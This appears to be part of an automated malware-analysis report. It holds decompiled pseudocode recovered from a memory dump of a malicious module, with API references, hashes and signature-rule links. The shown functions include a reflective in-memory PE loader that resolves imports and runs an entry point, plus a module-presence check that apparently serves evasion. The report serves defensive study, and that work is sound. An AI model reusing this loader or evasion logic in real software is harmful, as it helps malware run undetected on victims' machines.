							 *_t117 =  *(_t272 + 0x6c) + _a4;
							__eflags =  *_t117;
							_t119 = _t272 + 0x6c; // 0xa1ec8b55
							_t234 =  *_t119;
						}
						__eflags =  *(_t272 + 0x16c0) - _t234;
						if( *(_t272 + 0x16c0) < _t234) {
							 *(_t272 + 0x16c0) = _t234;
						}
						_t122 = _t272 + 0x16bc; // 0x8b3c7e89
						_t123 = _t272 + 0xc; // 0x452bf84d
						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
						__eflags = _t257 - 0xffff;
						_t258 =  >  ? 0xffff : _t257;
						_t124 = _t272 + 0x2c; // 0x8df075ff
						_t151 =  *_t124;
						_t125 = _t272 + 0x5c; // 0x84e85000
						_t235 = _t234 -  *_t125;
						__eflags = _t258 - _t151;
						_t152 =  <=  ? _t258 : _t151;
						__eflags = _t235 - ( <=  ? _t258 : _t151);
						if(_t235 >= ( <=  ? _t258 : _t151)) {
							L49:
							__eflags = _t235 - _t258;
							_t154 =  >  ? _t258 : _t235;
							_a4 =  >  ? _t258 : _t235;
							__eflags = _t222 - 4;
							if(_t222 != 4) {
								L53:
								_t269 = 0;
								__eflags = 0;
							} else {
								_t161 =  *_t272;
								__eflags =  *(_t161 + 4);
								_t154 = _a4;
								if( *(_t161 + 4) != 0) {
									goto L53;
								} else {
									__eflags = _t154 - _t235;
									if(_t154 != _t235) {
										goto L53;
									} else {
										_t269 = _t222 - 3;
									}
								}
							}
							_t131 = _t272 + 0x38; // 0xf47d8bff
							_t132 = _t272 + 0x5c; // 0x84e85000
							E10015D90(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
							_t134 = _t272 + 0x5c;
							 *_t134 =  *(_t272 + 0x5c) + _a4;
							__eflags =  *_t134;
							E10014AF0( *_t134,  *_t272);
						} else {
							__eflags = _t235;
							if(_t235 != 0) {
								L46:
								__eflags = _t222;
								if(_t222 != 0) {
									_t162 =  *_t272;
									__eflags =  *(_t162 + 4);
									if( *(_t162 + 4) == 0) {
										__eflags = _t235 - _t258;
										if(_t235 <= _t258) {
											goto L49;
										}
									}
								}
							} else {
								__eflags = _t222 - 4;
								if(_t222 == 4) {
									goto L46;
								}
							}
						}
						asm("sbb edi, edi");
						_t271 =  ~_t269 & 0x00000002;
						__eflags = _t271;
						return _t271;
					} else {
						__eflags = _t218 - 4;
						if(_t218 == 4) {
							goto L34;
						} else {
							_t173 =  *_t272;
							__eflags =  *(_t173 + 4);
							if( *(_t173 + 4) != 0) {
								goto L34;
							} else {
								_t88 = _t272 + 0x5c; // 0x84e85000
								__eflags = _t254 -  *_t88;
								if(_t254 !=  *_t88) {
									goto L34;
								} else {
									return 1;
								}
							}
						}
					}
				} else {
					return 3;
				}
			}

0x10012d76
0x10012d7b
0x10012d7f
0x10012d82
0x10012d82
0x10012d85
0x10012d8a
0x10012d8f
0x10012d92
0x10012d97
0x10012d9a
0x10012da0
0x10012da0
0x10012dab
0x10012dae
0x10012db5
0x10012dba
0x00000000
0x00000000
0x10012dc0
0x10012dc5
0x10012dc5
0x10012dca
0x10012dd0
0x10012dda
0x10012ddf
0x10012de5
0x10012e04
0x10012e07
0x10012e12
0x10012e12
0x10012e12
0x10012e09
0x10012e09
0x10012e0b
0x00000000
0x10012e0d
0x10012e0d
0x10012e0d
0x10012e0b
0x10012e1a
0x10012e1f
0x10012e24
0x10012e2a
0x10012e2e
0x10012e31
0x10012e34
0x10012e3a
0x10012e3f
0x10012e42
0x10012e48
0x10012e4d
0x10012e53
0x10012e59
0x10012e5e
0x10012e61
0x10012e66
0x10012e6a
0x10012e6e
0x10012e71
0x10012e74
0x10012e7d
0x10012e84
0x10012e87
0x10012e8a
0x10012e8f
0x10012e94
0x10012e97
0x10012e9a
0x10012e9a
0x10012e9e
0x10012ea7
0x10012eae
0x10012eb1
0x10012eb6
0x10012ebb
0x10012ebb
0x10012ebe
0x10012ec3
0x00000000
0x00000000
0x10012de7
0x10012de9
0x10012df6
0x00000000
0x00000000
0x10012df6
0x10012de9
0x00000000
0x10012de5
0x10012ec9
0x10012ece
0x10012ed1
0x10012ed4
0x10012f7f
0x10012f7f
0x10012eda
0x10012eda
0x10012eda
0x10012edf
0x10012f09
0x10012f0c
0x10012f0c
0x10012f11
0x10012f13
0x10012f15
0x10012f18
0x10012f1b
0x10012f23
0x10012f28
0x10012f28
0x10012f2e
0x10012f31
0x10012f34
0x10012f37
0x10012f39
0x10012f39
0x10012f3a
0x10012f3a
0x10012f37
0x10012f48
0x10012f4b
0x10012f4f
0x10012f54
0x10012f57
0x10012f5a
0x10012f5a
0x10012f5a
0x10012f5d
0x10012f5d
0x10012f60
0x10012f60
0x10012ee1
0x10012ee1
0x10012ef1
0x10012ef4
0x10012ef9
0x10012ef9
0x10012efc
0x10012eff
0x10012f02
0x10012f04
0x10012f04
0x10012f63
0x10012f65
0x10012f68
0x10012f68
0x10012f6e
0x10012f72
0x10012f75
0x10012f77
0x10012f77
0x10012f88
0x10012f8a
0x10012f8a
0x10012f92
0x10012fa0
0x10012fa3
0x10012fa5
0x10012fc5
0x10012fc5
0x10012fc8
0x10012fce
0x10012fcf
0x10012fd2
0x10012fd4
0x10012fd7
0x10012fda
0x10012fdd
0x10012fe1
0x10012fe4
0x10012fe7
0x10012fea
0x10012fec
0x10012fec
0x10012fef
0x10012ff1
0x10012ff1
0x10012ff4
0x10012ff6
0x10012ff9
0x10013001
0x10013004
0x10013009
0x10013009
0x1001300f
0x10013012
0x10013015
0x10013017
0x10013017
0x10013018
0x10013018
0x10013023
0x10013023
0x10013023
0x10013026
0x10013029
0x10013029
0x1001302c
0x1001302c
0x10012fef
0x1001302f
0x10013032
0x10013035
0x10013037
0x1001303a
0x1001303c
0x1001303f
0x10013042
0x10013044
0x10013047
0x1001304f
0x10013057
0x1001305a
0x1001305a
0x1001305a
0x1001305d
0x1001305d
0x1001305d
0x10013060
0x10013066
0x10013068
0x10013068
0x1001306e
0x10013074
0x1001307d
0x10013084
0x10013086
0x10013089
0x10013089
0x1001308c
0x1001308c
0x1001308f
0x10013091
0x10013094
0x10013096
0x100130b1
0x100130b1
0x100130b5
0x100130b8
0x100130bb
0x100130be
0x100130d4
0x100130d4
0x100130d4
0x100130c0
0x100130c0
0x100130c2
0x100130c6
0x100130c9
0x00000000
0x100130cb
0x100130cb
0x100130cd
0x00000000
0x100130cf
0x100130cf
0x100130cf
0x100130cd
0x100130c9
0x100130d8
0x100130db
0x100130e0
0x100130ea
0x100130ea
0x100130ea
0x100130ed
0x10013098
0x10013098
0x1001309a
0x100130a1
0x100130a1
0x100130a3
0x100130a5
0x100130a7
0x100130ab
0x100130ad
0x100130af
0x00000000
0x00000000
0x100130af
0x100130ab
0x1001309c
0x1001309c
0x1001309f
0x00000000
0x00000000
0x1001309f
0x1001309a
0x100130f7
0x100130f9
0x100130f9
0x10013104
0x10012fa7
0x10012fa7
0x10012faa
0x00000000
0x10012fac
0x10012fac
0x10012fae
0x10012fb2
0x00000000
0x10012fb4
0x10012fb4
0x10012fb4
0x10012fb7
0x00000000
0x10012fbb
0x10012fc4
0x10012fc4
0x10012fb7
0x10012fb2
0x10012faa
0x10012f96
0x10012f9f
0x10012f9f

APIs

memcpy.MSVCRT ref: 10012E7D
memcpy.MSVCRT ref: 10012EF4
memcpy.MSVCRT ref: 10012F23
memcpy.MSVCRT ref: 10012F4F
memcpy.MSVCRT ref: 10013004

Part of subcall function 10015D90: memcpy.MSVCRT ref: 10015E6E

Part of subcall function 10014AF0: memcpy.MSVCRT ref: 10014B1A

Memory Dump Source

Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
Instruction ID: 4fdc6b10e7b7168a0789f31eb0048a9ad86d4efd395f939b62a688ab4a7349d5
Opcode Fuzzy Hash: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
Instruction Fuzzy Hash: FAD112B5600A009FCB24CF69D8D4A6AB7F1FF88344B25892DE88ACB711D771E9958B50

Uniqueness

Uniqueness Score: -1.00%

Function 10004D6D, Relevance: 6.4, APIs: 4, Instructions: 432
stringCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E10004D6D(intOrPtr* __ecx, void* __edx, void* __fp0) {
				char _v516;
				char _v556;
				char _v564;
				char _v568;
				char _v572;
				char _v576;
				intOrPtr _v580;
				char _v588;
				signed int _v596;
				intOrPtr _v602;
				intOrPtr _v604;
				char _v608;
				CHAR* _v612;
				CHAR* _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				char _v636;
				intOrPtr _t119;
				signed int _t122;
				CHAR* _t124;
				intOrPtr _t125;
				CHAR* _t127;
				WCHAR* _t130;
				intOrPtr _t133;
				intOrPtr _t137;
				WCHAR* _t138;
				intOrPtr _t142;
				WCHAR* _t143;
				CHAR* _t144;
				intOrPtr _t145;
				intOrPtr _t150;
				intOrPtr _t153;
				WCHAR* _t154;
				signed int _t159;
				WCHAR* _t160;
				intOrPtr _t163;
				intOrPtr _t165;
				intOrPtr _t166;
				intOrPtr _t170;
				signed int _t173;
				signed int _t178;
				intOrPtr _t182;
				WCHAR* _t184;
				char _t186;
				WCHAR* _t188;
				intOrPtr _t200;
				intOrPtr _t211;
				signed int _t215;
				char _t220;
				WCHAR* _t231;
				intOrPtr _t235;
				intOrPtr _t238;
				intOrPtr _t239;
				intOrPtr _t246;
				signed int _t248;
				WCHAR* _t249;
				CHAR* _t250;
				intOrPtr _t262;
				void* _t271;
				intOrPtr _t272;
				signed int _t277;
				void* _t278;
				intOrPtr _t280;
				signed int _t282;
				void* _t298;
				void* _t299;
				intOrPtr _t305;
				CHAR* _t326;
				void* _t328;
				WCHAR* _t329;
				intOrPtr _t331;
				WCHAR* _t333;
				signed int _t335;
				intOrPtr* _t337;
				void* _t338;
				void* _t339;
				void* _t353;

				_t353 = __fp0;
				_t337 = (_t335 & 0xfffffff8) - 0x26c;
				_t119 =  *0x1001e688; // 0x8a40590
				_v620 = _v620 & 0x00000000;
				_t328 = __ecx;
				if(( *(_t119 + 0x1898) & 0x00000082) == 0) {
					L7:
					_t14 = E1000B7A8(0x1001b9c8,  &_v516) + 1; // 0x1
					E1000A86D( &_v556, _t14, _t351);
					_t298 = 0x64;
					_t122 = E1000A471( &_v556, _t298);
					 *0x1001e748 = _t122;
					if(_t122 != 0) {
						_push(0x4e5);
						_t299 = 0x10;
						 *0x1001e680 = E1000E1BC(0x1001b9cc, _t299);
						 *_t337 = 0x610;
						_t124 = E100095E1(0x1001b9cc);
						_push(0);
						_push(_t124);
						_v612 = _t124;
						_t125 =  *0x1001e688; // 0x8a40590
						_t127 = E100092E5(_t125 + 0x228);
						_t338 = _t337 + 0xc;
						_v616 = _t127;
						E100085D5( &_v612);
						_t130 = E1000B269(_t127);
						_t246 = 3;
						__eflags = _t130;
						if(_t130 != 0) {
							 *((intOrPtr*)(_t328 + 0x10)) = _t239;
							 *_t328 = _t246;
						}
						E1000861A( &_v616, 0xfffffffe);
						_t133 =  *0x1001e688; // 0x8a40590
						_t22 = _t133 + 0x114; // 0x8a406a4
						E10004A0B( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x110)))), _t22, _t353, _t328, 0, 0);
						_t262 =  *0x1001e688; // 0x8a40590
						_t339 = _t338 + 0x14;
						__eflags =  *((intOrPtr*)(_t262 + 0x101c)) - _t246;
						if( *((intOrPtr*)(_t262 + 0x101c)) == _t246) {
							L17:
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							_v572 = _t328;
							_v576 =  *((intOrPtr*)(_t262 + 0x214));
							_t137 =  *0x1001e680; // 0x0
							_t138 =  *(_t137 + 8);
							__eflags = _t138;
							if(_t138 != 0) {
								 *_t138(0, 0, 1,  &_v568,  &_v564);
							}
							_v620 = _v620 & 0x00000000;
							E1000E2C6(_t353,  &_v576);
							_pop(_t262);
							_t142 =  *0x1001e6b4; // 0x8abfc48
							_t143 =  *((intOrPtr*)(_t142 + 0x10))(0, 0,  &_v620);
							__eflags = _t143;
							if(_t143 == 0) {
								E1000E2C6(_t353,  &_v588);
								_t235 =  *0x1001e6b4; // 0x8abfc48
								_pop(_t262);
								 *((intOrPtr*)(_t235 + 0xc))(_v632);
							}
							__eflags =  *0x1001e73c;
							if( *0x1001e73c <= 0) {
								goto L36;
							} else {
								_t165 =  *0x1001e680; // 0x0
								__eflags =  *(_t165 + 8);
								if( *(_t165 + 8) != 0) {
									_t231 =  *(_t165 + 0xc);
									__eflags = _t231;
									if(_t231 != 0) {
										 *_t231(_v580);
									}
								}
								_t166 =  *0x1001e688; // 0x8a40590
								_t262 =  *((intOrPtr*)(_t166 + 0x214));
								__eflags = _t262 - _t246;
								if(_t262 == _t246) {
									goto L36;
								} else {
									__eflags =  *((intOrPtr*)(_t166 + 4)) - 6;
									if( *((intOrPtr*)(_t166 + 4)) >= 6) {
										__eflags =  *((intOrPtr*)(_t166 + 0x101c)) - _t246;
										if( *((intOrPtr*)(_t166 + 0x101c)) == _t246) {
											E100049A5();
											asm("stosd");
											asm("stosd");
											asm("stosd");
											asm("stosd");
											_t170 =  *0x1001e684; // 0x8abfaa0
											 *((intOrPtr*)(_t170 + 0xd8))( &_v608);
											_t262 = _v602;
											_t248 = 0x3c;
											_t173 = _t262 + 0x00000002 & 0x0000ffff;
											_v596 = _t173;
											_v620 = _t173 / _t248 + _v604 & 0x0000ffff;
											_t178 = _t262 + 0x0000000e & 0x0000ffff;
											_v624 = _t178;
											_v628 = _t178 / _t248 + _v604 & 0x0000ffff;
											_t182 =  *0x1001e688; // 0x8a40590
											_t184 = E1000FC1F(_t182 + 0x228, _t178 % _t248, _t353, 0, _t182 + 0x228, 0);
											_t339 = _t339 + 0xc;
											__eflags = _t184;
											if(_t184 >= 0) {
												_t333 = E10008604(0x1000);
												_v616 = _t333;
												_pop(_t262);
												__eflags = _t333;
												if(_t333 != 0) {
													_t186 = E1000109A(_t262, 0x148);
													_t305 =  *0x1001e688; // 0x8a40590
													_v636 = _t186;
													_push(_t305 + 0x648);
													_push(0xa);
													_push(7);
													_t271 = 2;
													E1000902D(_t271,  &_v572);
													_t272 =  *0x1001e688; // 0x8a40590
													_t188 = E100060DF( &_v572, _t272 + 0x228, 1,  *((intOrPtr*)(_t272 + 0xa0)));
													_t339 = _t339 + 0x18;
													_v632 = _t188;
													__eflags = _t188;
													if(_t188 != 0) {
														_push(_v624 % _t248 & 0x0000ffff);
														_push(_v628 & 0x0000ffff);
														_push(_v596 % _t248 & 0x0000ffff);
														_push(_v620 & 0x0000ffff);
														_push(_v632);
														_push( &_v572);
														_t200 =  *0x1001e688; // 0x8a40590
														__eflags = _t200 + 0x1020;
														E10009640(_t333, 0x1000, _v636, _t200 + 0x1020);
														E100085D5( &_v636);
														E1000A911(_t333, 0, 0xbb8, 1);
														E1000861A( &_v632, 0xfffffffe);
														_t339 = _t339 + 0x44;
													}
													E1000861A( &_v616, 0xfffffffe);
													_pop(_t262);
												}
											}
										}
										goto L36;
									}
									__eflags = _t262 - 2;
									if(_t262 != 2) {
										goto L36;
									}
									E100049A5();
									asm("stosd");
									asm("stosd");
									asm("stosd");
									asm("stosd");
									_t211 =  *0x1001e684; // 0x8abfaa0
									 *((intOrPtr*)(_t211 + 0xd8))( &_v608);
									_t215 = _v602 + 0x00000002 & 0x0000ffff;
									_v628 = _t215;
									_t277 = 0x3c;
									_v632 = _t215 / _t277 + _v604 & 0x0000ffff;
									_t249 = E10008604(0x1000);
									_v624 = _t249;
									_pop(_t278);
									__eflags = _t249;
									if(_t249 != 0) {
										_t220 = E100095E1(_t278, 0x32d);
										_t280 =  *0x1001e688; // 0x8a40590
										_push(_t280 + 0x228);
										_t282 = 0x3c;
										_v636 = _t220;
										_push(_v628 % _t282 & 0x0000ffff);
										E10009640(_t249, 0x1000, _t220, _v632 & 0x0000ffff);
										E100085D5( &_v636);
										E1000A911(_t249, 0, 0xbb8, 1);
										E1000861A( &_v624, 0xfffffffe);
									}
									goto L41;
								}
							}
						} else {
							_t238 =  *((intOrPtr*)(_t262 + 0x214));
							__eflags = _t238 - _t246;
							if(_t238 == _t246) {
								goto L17;
							}
							__eflags =  *((intOrPtr*)(_t262 + 4)) - 6;
							if( *((intOrPtr*)(_t262 + 4)) >= 6) {
								L36:
								_t144 = E100095E1(_t262, 0x610);
								_push(0);
								_push(_t144);
								_v616 = _t144;
								_t145 =  *0x1001e688; // 0x8a40590
								_t329 = E100092E5(_t145 + 0x228);
								_v612 = _t329;
								__eflags = _t329;
								if(_t329 != 0) {
									_t160 = E1000B269(_t329);
									__eflags = _t160;
									if(_t160 != 0) {
										_t163 =  *0x1001e684; // 0x8abfaa0
										 *((intOrPtr*)(_t163 + 0x10c))(_t329);
									}
									E1000861A( &_v612, 0xfffffffe);
								}
								E100085D5( &_v616);
								_t150 =  *0x1001e688; // 0x8a40590
								lstrcpynW(_t150 + 0x438,  *0x1001e740, 0x105);
								_t153 =  *0x1001e688; // 0x8a40590
								_t154 = _t153 + 0x228;
								__eflags = _t154;
								lstrcpynW(_t154,  *0x1001e738, 0x105);
								_t331 =  *0x1001e688; // 0x8a40590
								_t117 = _t331 + 0x228; // 0x8a407b8
								 *((intOrPtr*)(_t331 + 0x434)) = E10008FBE(_t117, __eflags);
								E1000861A(0x1001e740, 0xfffffffe);
								E1000861A(0x1001e738, 0xfffffffe);
								L41:
								_t159 = 0;
								__eflags = 0;
								L42:
								return _t159;
							}
							__eflags = _t238 - 2;
							if(_t238 != 2) {
								goto L36;
							}
							goto L17;
						}
					}
					L8:
					_t159 = _t122 | 0xffffffff;
					goto L42;
				}
				_t250 = E100095C7(0x6e2);
				_v616 = _t250;
				_t326 = E100095C7(0x9f5);
				_v612 = _t326;
				if(_t250 != 0 && _t326 != 0) {
					if(GetModuleHandleA(_t250) != 0 || GetModuleHandleA(_t326) != 0) {
						_v620 = 1;
					}
					E100085C2( &_v616);
					_t122 = E100085C2( &_v612);
					_t351 = _v620;
					if(_v620 != 0) {
						goto L8;
					}
				}
			}

0x10004d6d
0x10004d73
0x10004d79
0x10004d7e
0x10004d8c
0x10004d8f
0x10004dee
0x10004e00
0x10004e03
0x10004e0a
0x10004e0f
0x10004e14
0x10004e1b
0x10004e25
0x10004e2c
0x10004e37
0x10004e3c
0x10004e43
0x10004e49
0x10004e4b
0x10004e4c
0x10004e50
0x10004e5b
0x10004e60
0x10004e69
0x10004e6e
0x10004e76
0x10004e7d
0x10004e7e
0x10004e80
0x10004e9c
0x10004e9f
0x10004e9f
0x10004ea8
0x10004ead
0x10004ebd
0x10004ec5
0x10004eca
0x10004ed0
0x10004ed3
0x10004ed9
0x10004ef8
0x10004efe
0x10004eff
0x10004f00
0x10004f01
0x10004f02
0x10004f03
0x10004f0d
0x10004f11
0x10004f16
0x10004f19
0x10004f1b
0x10004f2d
0x10004f2d
0x10004f2f
0x10004f3b
0x10004f40
0x10004f46
0x10004f4f
0x10004f52
0x10004f54
0x10004f5f
0x10004f64
0x10004f69
0x10004f6e
0x10004f6e
0x10004f71
0x10004f78
0x00000000
0x10004f7e
0x10004f7e
0x10004f83
0x10004f87
0x10004f89
0x10004f8c
0x10004f8e
0x10004f94
0x10004f94
0x10004f8e
0x10004f96
0x10004f9b
0x10004fa1
0x10004fa3
0x00000000
0x10004fa9
0x10004fa9
0x10004fad
0x10005082
0x10005088
0x1000508e
0x10005099
0x1000509a
0x1000509b
0x1000509c
0x100050a2
0x100050a7
0x100050ad
0x100050b5
0x100050bb
0x100050be
0x100050cd
0x100050d4
0x100050d7
0x100050e4
0x100050e8
0x100050f5
0x100050fa
0x100050fd
0x100050ff
0x10005110
0x10005112
0x10005116
0x10005117
0x10005119
0x10005124
0x10005129
0x10005136
0x1000513a
0x1000513b
0x1000513d
0x10005145
0x10005146
0x1000514b
0x10005163
0x10005168
0x1000516b
0x1000516f
0x10005171
0x10005184
0x1000518e
0x10005192
0x1000519a
0x1000519b
0x100051a3
0x100051a4
0x100051a9
0x100051b5
0x100051bf
0x100051d1
0x100051dd
0x100051e2
0x100051e2
0x100051ec
0x100051f2
0x100051f2
0x10005119
0x100050ff
0x00000000
0x10005088
0x10004fb3
0x10004fb6
0x00000000
0x00000000
0x10004fbc
0x10004fc7
0x10004fc8
0x10004fc9
0x10004fca
0x10004fd0
0x10004fd5
0x10004fe9
0x10004fee
0x10004ff2
0x10004ffd
0x10005006
0x10005008
0x1000500c
0x1000500d
0x1000500f
0x1000501a
0x10005020
0x10005032
0x10005035
0x10005038
0x10005045
0x1000504d
0x10005057
0x10005069
0x10005075
0x1000507a
0x00000000
0x1000500f
0x10004fa3
0x10004edb
0x10004edb
0x10004ee1
0x10004ee3
0x00000000
0x00000000
0x10004ee5
0x10004ee9
0x100051f3
0x100051f8
0x100051fe
0x10005200
0x10005201
0x10005205
0x10005215
0x1000521a
0x1000521e
0x10005220
0x10005224
0x10005229
0x1000522b
0x1000522d
0x10005233
0x10005233
0x10005240
0x10005246
0x1000524c
0x10005251
0x1000526f
0x10005271
0x1000527d
0x1000527d
0x10005283
0x10005285
0x1000528b
0x1000529d
0x100052a3
0x100052af
0x100052b7
0x100052b7
0x100052b7
0x100052b9
0x100052bf
0x100052bf
0x10004eef
0x10004ef2
0x00000000
0x00000000
0x00000000
0x10004ef2
0x10004ed9
0x10004e1d
0x10004e1d
0x00000000
0x10004e1d
0x10004d9b
0x10004da2
0x10004dab
0x10004dad
0x10004db3
0x10004dc4
0x10004dcd
0x10004dcd
0x10004dd9
0x10004de2
0x10004de7
0x10004dec
0x00000000
0x00000000
0x10004dec

APIs

GetModuleHandleA.KERNEL32(00000000,00000000), ref: 10004DC0
GetModuleHandleA.KERNEL32(00000000), ref: 10004DC7
lstrcpynW.KERNEL32(08A40158,00000105), ref: 1000526F
lstrcpynW.KERNEL32(08A40368,00000105), ref: 10005283

Memory Dump Source

Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: HandleModulelstrcpyn
String ID:
API String ID: 3430401031-0
Opcode ID: dea4718fcff11b40ad77ac1c7875c25be4704c52ca9a87ecd19dbb36a7e3fe5b
Instruction ID: cc48400d40a66e7674bcd18edc35038107661711004b249490cc292a5082b98a
Opcode Fuzzy Hash: dea4718fcff11b40ad77ac1c7875c25be4704c52ca9a87ecd19dbb36a7e3fe5b
Instruction Fuzzy Hash: A7E1CC71608341AFF340CF64CC86F6A73E9EB88390F454A29F584DB2D5EB75EA448B52

Uniqueness

Uniqueness Score: -1.00%

Function 10012AEC, Relevance: 6.2, APIs: 4, Instructions: 219
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E10012AEC(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed int _v5;
				signed short _v12;
				intOrPtr* _v16;
				signed int* _v20;
				intOrPtr _v24;
				unsigned int _v28;
				signed short* _v32;
				struct HINSTANCE__* _v36;
				intOrPtr* _v40;
				signed short* _v44;
				intOrPtr _v48;
				unsigned int _v52;
				intOrPtr _v56;
				_Unknown_base(*)()* _v60;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				unsigned int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				signed int _t149;
				void* _t189;
				signed int _t194;
				signed int _t196;
				intOrPtr _t236;

				_v72 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
				_v24 = _v72;
				_t236 = _a4 -  *((intOrPtr*)(_v24 + 0x34));
				_v56 = _t236;
				if(_t236 == 0) {
					L13:
					while(0 != 0) {
					}
					_push(8);
					if( *((intOrPtr*)(_v24 + 0xbadc25)) == 0) {
						L35:
						_v68 =  *((intOrPtr*)(_v24 + 0x28)) + _a4;
						while(0 != 0) {
						}
						if(_a12 != 0) {
							 *_a12 = _v68;
						}
						 *((intOrPtr*)(_v24 + 0x34)) = _a4;
						return _v68(_a4, 1, _a8);
					}
					_v84 = 0x80000000;
					_t149 = 8;
					_v16 = _a4 +  *((intOrPtr*)(_v24 + (_t149 << 0) + 0x78));
					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						if(_v36 == 0) {
							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						}
						if(_v36 != 0) {
							if( *_v16 == 0) {
								_v20 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
							} else {
								_v20 =  *_v16 + _a4;
							}
							_v64 = _v64 & 0x00000000;
							while( *_v20 != 0) {
								if(( *_v20 & _v84) == 0) {
									_v88 =  *_v20 + _a4;
									_v60 = GetProcAddress(_v36, _v88 + 2);
								} else {
									_v60 = GetProcAddress(_v36,  *_v20 & 0x0000ffff);
								}
								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
									 *_v20 = _v60;
								} else {
									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v64) = _v60;
								}
								_v20 =  &(_v20[1]);
								_v64 = _v64 + 4;
							}
							_v16 = _v16 + 0x14;
							continue;
						} else {
							_t189 = 0xfffffffd;
							return _t189;
						}
					}
					goto L35;
				}
				_t194 = 8;
				_v44 = _a4 +  *((intOrPtr*)(_v24 + 0x78 + _t194 * 5));
				_t196 = 8;
				_v48 =  *((intOrPtr*)(_v24 + 0x7c + _t196 * 5));
				while(0 != 0) {
				}
				while(_v48 > 0) {
					_v28 = _v44[2];
					_v48 = _v48 - _v28;
					_v28 = _v28 - 8;
					_v28 = _v28 >> 1;
					_v32 =  &(_v44[4]);
					_v80 = _a4 +  *_v44;
					_v52 = _v28;
					while(1) {
						_v76 = _v52;
						_v52 = _v52 - 1;
						if(_v76 == 0) {
							break;
						}
						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
						_v12 =  *_v32 & 0xfff;
						_v40 = (_v12 & 0x0000ffff) + _v80;
						if((_v5 & 0x000000ff) != 3) {
							if((_v5 & 0x000000ff) == 0xa) {
								 *_v40 =  *_v40 + _v56;
							}
						} else {
							 *_v40 =  *_v40 + _v56;
						}
						_v32 =  &(_v32[1]);
					}
					_v44 = _v32;
				}
				goto L13;
			}

0x10012afb
0x10012b01
0x10012b0a
0x10012b0d
0x10012b10
0x00000000
0x10012c01
0x10012c05
0x10012c07
0x10012c15
0x10012d33
0x10012d3c
0x10012d3f
0x10012d43
0x10012d49
0x10012d51
0x10012d51
0x10012d59
0x00000000
0x10012d64
0x10012c1b
0x10012c24
0x10012c32
0x10012c35
0x10012c52
0x10012c59
0x10012c6b
0x10012c6b
0x10012c72
0x10012c82
0x10012c9a
0x10012c84
0x10012c8c
0x10012c8c
0x10012c9d
0x10012ca1
0x10012cb1
0x10012cd4
0x10012ce6
0x10012cb3
0x10012cc7
0x10012cc7
0x10012cf0
0x10012d0c
0x10012cf2
0x10012d01
0x10012d01
0x10012d14
0x10012d1d
0x10012d1d
0x10012d2b
0x00000000
0x10012c74
0x10012c76
0x00000000
0x10012c76
0x10012c72
0x00000000
0x10012c35
0x10012b18
0x10012b26
0x10012b2b
0x10012b36
0x10012b39
0x10012b3d
0x10012b3f
0x10012b4f
0x10012b58
0x10012b61
0x10012b69
0x10012b72
0x10012b7d
0x10012b83
0x10012b86
0x10012b89
0x10012b90
0x10012b97
0x00000000
0x00000000
0x10012ba2
0x10012bb0
0x10012bbb
0x10012bc5
0x10012bdd
0x10012bea
0x10012bea
0x10012bc7
0x10012bd2
0x10012bd2
0x10012bf1
0x10012bf1
0x10012bf9
0x10012bf9
0x00000000

APIs

GetModuleHandleA.KERNEL32(?), ref: 10012C4C
LoadLibraryA.KERNEL32(?), ref: 10012C65
GetProcAddress.KERNEL32(00000000,890CC483), ref: 10012CC1
GetProcAddress.KERNEL32(00000000,?), ref: 10012CE0

Memory Dump Source

Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID:
API String ID: 384173800-0
Opcode ID: 5436229f79adfd2309291a4696e3cc16a3b33e027d57b62ece0ec2bba77662a7
Instruction ID: 2edd54a6eb651874f6cc264e5dd0ce055865838d2197d7e71e48a8f46057b6f1
Opcode Fuzzy Hash: 5436229f79adfd2309291a4696e3cc16a3b33e027d57b62ece0ec2bba77662a7
Instruction Fuzzy Hash: 62A168B5E00219DFCB40CFA8D881AADBBF1FF08354F108469E915AB351D734EA91CB64

Uniqueness

Uniqueness Score: -1.00%

Function 10001C68, Relevance: 6.1, APIs: 4, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E10001C68(signed int __ecx, void* __eflags, void* __fp0) {
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				void* _t13;
				intOrPtr _t15;
				signed int _t16;
				intOrPtr _t17;
				signed int _t18;
				char _t20;
				intOrPtr _t22;
				void* _t23;
				void* _t24;
				intOrPtr _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t43;
				intOrPtr _t48;
				void* _t51;
				signed int _t61;
				signed int _t64;
				void* _t71;

				_t71 = __fp0;
				_t61 = __ecx;
				_t41 =  *0x1001e6dc; // 0x0
				_t13 = E1000A4BF(_t41, 0);
				while(_t13 < 0) {
					E1000980C( &_v28);
